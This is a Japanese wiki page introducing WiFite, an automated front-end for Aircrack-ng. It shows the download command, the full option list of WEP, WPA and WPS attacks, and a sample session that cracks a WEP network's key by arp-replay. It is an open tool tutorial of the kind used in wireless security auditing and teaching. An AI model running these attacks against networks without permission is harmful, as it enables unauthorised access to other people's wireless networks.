
提供: セキュリティ
移動: 案内検索
(ページの作成:「<!-- vim: filetype=mediawiki --> WiFite とは、Aircrack-ng のフロントエンドです。簡単に無線LANをクラックできます。 '''読み方...」)

2013年7月25日 (木) 00:55時点における版

WiFite とは、Aircrack-ng のフロントエンドです。簡単に無線LANをクラックできます。




WiFite は、Aircrack-ng の自動化スクリプトです。 ターゲットのAPを選択し、放置しておけば、そのうちクラックが完了します。 非常に簡単に利用できます。


Kali Linuxでは、/usr/bin/wifite にあります。


wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py
chmod +x wifite.py

依存関係として Aircrack-ng が必要です。


  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             
	-check <file>	check capfile <file> for handshakes.
	-cracked    	display previously-cracked access points
	-all         	attack all targets.              [off]
	-i <iface>  	wireless interface for capturing [auto]
	-mac         	anonymize mac address            [off]
	-c <channel>	channel to scan for targets      [auto]
	-e <essid>  	target a specific access point by ssid (name)  [ask]
	-b <bssid>  	target a specific access point by bssid (mac)  [auto]
	-showb       	display target BSSIDs after scan               [off]
	-pow <db>   	attacks any targets with signal strenghth > db [0]
	-quiet       	do not print list of APs during scan           [off]
	-wpa        	only target WPA networks (works with -wps -wep)   [off]
	-wpat <sec>   	time to wait for WPA attack to complete (seconds) [500]
	-wpadt <sec>  	time to wait between sending deauth packets (sec) [10]
	-strip      	strip handshake using tshark or pyrit             [off]
	-crack <dic>	crack WPA handshakes using <dic> wordlist file    [off]
	-dict <file>	specify dictionary to use when cracking WPA [phpbb.txt]
	-aircrack   	verify handshake using aircrack [on]
	-pyrit      	verify handshake using pyrit    [off]
	-tshark     	verify handshake using tshark   [on]
	-cowpatty   	verify handshake using cowpatty [off]
	-wep        	only target WEP networks [off]
	-pps <num>  	set the number of packets per second to inject [600]
	-wept <sec> 	sec to wait for each attack, 0 implies endless [600]
	-chopchop   	use chopchop attack      [on]
	-arpreplay  	use arpreplay attack     [on]
	-fragment   	use fragmentation attack [on]
	-caffelatte 	use caffe-latte attack   [on]
	-p0841      	use -p0841 attack        [on]
	-hirte      	use hirte (cfrag) attack [on]
	-nofakeauth 	stop attack if fake authentication fails    [off]
	-wepca <n>  	start cracking when number of ivs surpass n [10000]
	-wepsave    	save a copy of .cap files to this directory [off]
	-wps       	only target WPS networks         [off]
	-wpst <sec>  	max wait for new retry before giving up (0: never)  [660]
	-wpsratio <per>	min ratio of successful PIN attempts/total tries    [0]
	-wpsretry <num>	max number of retries for same PIN before giving up [0]
	./wifite.py -wps -wep -c 6 -pps 600


wifite コマンドを実行します。

% wifite
  .;'                     `;,    
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,  
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'  
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'     
           /       \             
 [+] scanning for wireless devices...
 [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
 [0:00:02] scanning wireless networks. 0 targets and 0 clients found   
 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  CG-Guest               6  WEP   46db   n/a   client
 [0:30:06] scanning wireless networks. 1 target and 2 clients found

C-c を押して、割り込みます。


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  CG-Guest               6  WEP   46db   n/a   client
 [+] select target numbers (1-1) separated by commas, or 'all': 1

ターゲットを選択するとキャプチャーが始まります。 対象となっている 無線LAN

 [+] 1 target selected.
 [0:10:00] preparing attack "CG-Guest" (00:11:22:33:44:55)
 [0:10:00] attempting fake authentication (1/5)...  success! 
 [0:10:00] attacking "CG-Guest" via arp-replay attack
 [0:09:37] captured 0 ivs @ 0 iv/sec

キャプチャがある程度進むと、クラックができます。 今回の無線LANのパスワードは、1111111111 です。

 [0:07:59] started cracking (over 10000 ivs)        
 [0:07:47] captured 26172 ivs @ 1820 iv/sec         
 [0:07:47] cracked CG-Guest (00:11:22:33:44:55)! key: "1111111111"
 [+] 1 attack completed:
 [+] 1/1 WEP attacks succeeded
        cracked CG-Guest (00:11:22:33:44:55), key: "1111111111"
 [+] quitting
